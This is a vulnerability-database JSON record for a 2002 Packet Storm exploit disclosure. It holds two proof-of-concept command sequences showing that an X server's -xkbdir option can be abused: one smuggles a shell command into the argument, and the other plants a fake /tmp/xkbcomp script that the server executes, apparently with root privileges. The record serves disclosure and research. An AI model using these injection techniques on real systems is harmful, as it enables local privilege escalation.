{"id": "PACKETSTORM:29486", "type": "packetstorm", "bulletinFamily": "exploit", "title": "calderax.txt", "description": "", "published": "2002-08-29T00:00:00", "modified": "2002-08-29T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/29486/calderax.txt.html", "reporter": "Pavel Kankovsky", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:22:24", "viewCount": 9, "enchantments": {"score": {"value": -0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.0}, "sourceHref": "https://packetstormsecurity.com/files/download/29486/calderax.txt", "sourceData": "`The following proof of concepts were provided by Pavel Kankovsky: \n$ Xserver -xkbdir 'id > /tmp/I_WAS_HERE;' \n[exit X server] \n$ grep root /tmp/I_WAS_HERE && echo 'Gotcha!' \n \n$ cat > /tmp/xkbcomp \n#!/bin/sh \nid > /tmp/I_WAS_HERE \n[ctrl+d] \n$ chmod a+x /tmp/xkbcomp \n$ Xserver -xkbdir /tmp \n[X server executes /tmp/xkbcomp] \n \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647428502}}
{}